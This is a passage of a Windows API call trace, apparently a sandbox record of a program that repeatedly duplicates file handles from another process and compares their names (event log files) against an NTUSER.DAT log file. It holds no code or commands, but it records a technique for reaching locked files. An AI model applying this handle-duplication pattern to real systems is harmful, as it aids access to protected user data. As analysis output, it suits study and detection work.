_Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0152.652] CloseHandle (hObject=0x680) returned 1 [0152.653] CloseHandle (hObject=0x62c) returned 1 [0152.653] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.653] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.653] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.653] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.654] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.654] CloseHandle (hObject=0x670) returned 1 [0152.654] _wcsicmp (_Str1="\\Internet Explorer.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -5 [0152.654] CloseHandle (hObject=0x680) returned 1 [0152.654] CloseHandle (hObject=0x62c) returned 1 [0152.654] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.654] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x204, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.654] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.655] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.655] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.656] CloseHandle (hObject=0x670) returned 1 [0152.656] _wcsicmp (_Str1="\\Security.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0152.656] CloseHandle (hObject=0x680) returned 1 [0152.656] CloseHandle (hObject=0x62c) returned 1 [0152.656] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.656] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x210, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.656] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.657] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.657] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.657] CloseHandle (hObject=0x670) returned 1 [0152.657] _wcsicmp (_Str1="\\Windows PowerShell.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0152.657] CloseHandle (hObject=0x680) returned 1 [0152.657] CloseHandle (hObject=0x62c) returned 1 [0152.657] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.658] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x214, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.658] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.658] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.659] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.659] CloseHandle (hObject=0x670) returned 1 [0152.659] _wcsicmp (_Str1="\\OAlerts.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 1 [0152.659] CloseHandle (hObject=0x680) returned 1 [0152.659] CloseHandle (hObject=0x62c) returned 1 [0152.659] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.659] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x218, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.659] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.660] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.662] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.662] CloseHandle (hObject=0x670) returned 1 [0152.662] _wcsicmp (_Str1="\\Media Center.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0152.662] CloseHandle (hObject=0x680) returned 1 [0152.662] CloseHandle (hObject=0x62c) returned 1 [0152.662] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.662] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x21c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.662] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.663] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.664] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.664] CloseHandle (hObject=0x670) returned 1 [0152.664] _wcsicmp (_Str1="\\Key Management Service.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -3 [0152.664] CloseHandle (hObject=0x680) returned 1 [0152.664] CloseHandle (hObject=0x62c) returned 1 [0152.664] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.664] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x224, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.664] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.665] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.666] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.666] CloseHandle (hObject=0x670) returned 1 [0152.666] _wcsicmp (_Str1="\\HardwareEvents.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -6 [0152.666] CloseHandle (hObject=0x680) returned 1 [0152.666] CloseHandle (hObject=0x62c) returned 1 [0152.666] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.666] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x228, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.666] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.667] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.667] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.667] CloseHandle (hObject=0x670) returned 1 [0152.667] _wcsicmp (_Str1="\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0152.667] CloseHandle (hObject=0x680) returned 1 [0152.667] CloseHandle (hObject=0x62c) returned 1 [0152.668] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.668] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x22c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.668] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.668] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.669] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.669] CloseHandle (hObject=0x670) returned 1 [0152.669] _wcsicmp (_Str1="\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0152.669] CloseHandle (hObject=0x680) returned 1 [0152.669] CloseHandle (hObject=0x62c) returned 1 [0152.669] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.669] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.669] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.670] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.671] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.671] CloseHandle (hObject=0x670) returned 1 [0152.671] CloseHandle (hObject=0x680) returned 1 [0152.671] CloseHandle (hObject=0x62c) returned 1 [0152.671] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.671] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.671] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.672] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.672] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.672] CloseHandle (hObject=0x670) returned 1 [0152.672] CloseHandle (hObject=0x680) returned 1 [0152.672] CloseHandle (hObject=0x62c) returned 1 [0152.672] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.672] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x314, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.672] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.673] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.674] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.674] CloseHandle (hObject=0x670) returned 1 [0152.674] CloseHandle (hObject=0x680) returned 1 [0152.674] CloseHandle (hObject=0x62c) returned 1 [0152.674] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.674] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x318, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.674] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.675] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.675] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.675] CloseHandle (hObject=0x670) returned 1 [0152.675] CloseHandle (hObject=0x680) returned 1 [0152.676] CloseHandle (hObject=0x62c) returned 1 [0152.676] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.676] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x35c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.676] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.677] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.677] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.678] CloseHandle (hObject=0x670) returned 1 [0152.678] CloseHandle (hObject=0x680) returned 1 [0152.678] CloseHandle (hObject=0x62c) returned 1 [0152.678] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.678] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x40c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.678] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.679] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.680] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.681] CloseHandle (hObject=0x670) returned 1 [0152.681] CloseHandle (hObject=0x680) returned 1 [0152.681] CloseHandle (hObject=0x62c) returned 1 [0152.681] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.681] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x474, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.681] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.681] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.682] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.682] CloseHandle (hObject=0x670) returned 1 [0152.682] _wcsicmp (_Str1="\\Microsoft-Windows-ReadyBoost%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0152.682] CloseHandle (hObject=0x680) returned 1 [0152.682] CloseHandle (hObject=0x62c) returned 1 [0152.682] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.682] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.682] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.683] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.683] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.683] CloseHandle (hObject=0x670) returned 1 [0152.684] _wcsicmp (_Str1="\\Microsoft-Windows-GroupPolicy%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0152.684] CloseHandle (hObject=0x680) returned 1 [0152.684] CloseHandle (hObject=0x62c) returned 1 [0152.684] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.684] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4a8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.684] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.684] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.685] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.685] CloseHandle (hObject=0x670) returned 1 [0152.685] _wcsicmp (_Str1="\\Microsoft-Windows-Dhcp-Client%4Admin.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0152.685] CloseHandle (hObject=0x680) returned 1 [0152.685] CloseHandle (hObject=0x62c) returned 1 [0152.685] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.685] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.685] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.686] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.687] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.687] CloseHandle (hObject=0x670) returned 1 [0152.687] _wcsicmp (_Str1="\\Microsoft-Windows-OfflineFiles%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0152.687] CloseHandle (hObject=0x680) returned 1 [0152.687] CloseHandle (hObject=0x62c) returned 1 [0152.687] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.687] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4b4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.687] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.688] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.688] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.689] CloseHandle (hObject=0x670) returned 1 [0152.689] _wcsicmp (_Str1="\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0152.689] CloseHandle (hObject=0x680) returned 1 [0152.689] CloseHandle (hObject=0x62c) returned 1 [0152.689] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.689] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4b8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.689] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.690] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.690] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.690] CloseHandle (hObject=0x670) returned 1 [0152.690] _wcsicmp (_Str1="\\Microsoft-Windows-Winlogon%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0152.690] CloseHandle (hObject=0x680) returned 1 [0152.690] CloseHandle (hObject=0x62c) returned 1 [0152.690] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.690] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.691] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.691] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.692] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.692] CloseHandle (hObject=0x670) returned 1 [0152.692] _wcsicmp (_Str1="\\Microsoft-Windows-User Profile Service%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0152.692] CloseHandle (hObject=0x680) returned 1 [0152.692] CloseHandle (hObject=0x62c) returned 1 [0152.692] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.692] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4cc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.692] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.693] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.693] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.694] CloseHandle (hObject=0x670) returned 1 [0152.694] _wcsicmp (_Str1="\\Microsoft-Windows-BranchCacheSMB%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0152.694] CloseHandle (hObject=0x680) returned 1 [0152.694] CloseHandle (hObject=0x62c) returned 1 [0152.694] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.694] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4e4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.694] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.695] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.695] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.696] CloseHandle (hObject=0x670) returned 1 [0152.696] _wcsicmp (_Str1="\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0152.696] CloseHandle (hObject=0x680) returned 1 [0152.696] CloseHandle (hObject=0x62c) returned 1 [0152.696] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.696] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4ec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.696] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.696] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.698] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.698] CloseHandle (hObject=0x670) returned 1 [0152.699] _wcsicmp (_Str1="\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0152.699] CloseHandle (hObject=0x680) returned 1 [0152.699] CloseHandle (hObject=0x62c) returned 1 [0152.699] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0152.699] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x504, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.699] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.700] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.700] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.700] CloseHandle (hObject=0x670) returned 1 [0152.700] 